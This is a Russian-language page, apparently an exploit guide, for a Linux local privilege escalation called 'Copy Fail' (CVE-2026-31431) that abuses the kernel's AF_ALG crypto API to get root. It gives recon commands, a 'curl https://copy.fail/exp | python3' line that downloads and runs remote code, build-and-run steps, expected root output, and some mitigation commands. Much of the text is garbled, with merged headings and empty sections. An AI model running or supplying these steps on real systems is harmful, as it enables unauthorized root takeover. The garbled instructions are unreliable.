
Локальный эксплойт повышения привилегий в Linux для CVE-2026-31431, перезаписывающий кэш страниц SUID-бинарников через криптографический API ядра AF_ALG для получения root-доступа.
Этот контент предназначен только для образовательных целей и авторизованного тестирования безопасности. НЕ запускайте это на системах без явного разрешения.
Copy Fail (CVE-2026-31431) — это уязвимость локального повышения привилегий (LPE) в Linux, затрагивающая криптографический API ядра через AF_ALG.
Она позволяет непривилегированному пользователю перезаписать данные page cache SUID-бинарника (например, /usr/bin/su) и получить доступ root.
AF_ALGalgif_aeados.splicesocket(AF_ALG)uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg
Ожидаемые индикаторы:
authencesn(hmac(sha256),cbc(aes))algif_aead загруженpython3 copy_fail_exp.py
curl https://copy.fail/exp | python3
su
id
Ожидаемый результат:
uid=0(root)
os.splice not foundПричина:
Решение:
gcc copy_fail_exp.c -o copy_fail
chmod +x copy_fail
./copy_fail
su
Возможные причины:
Установите необходимые инструменты:
apt update && apt install build-essential
dmesg | grep -i alg
lsmod | grep algif_aead
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead
Обновите систему:
apt update && apt upgrade
Если эксплойт не срабатывает, рассмотрите:
Используйте этот эксплойт ответственно только в лабораториях, CTF и авторизованных пентестах.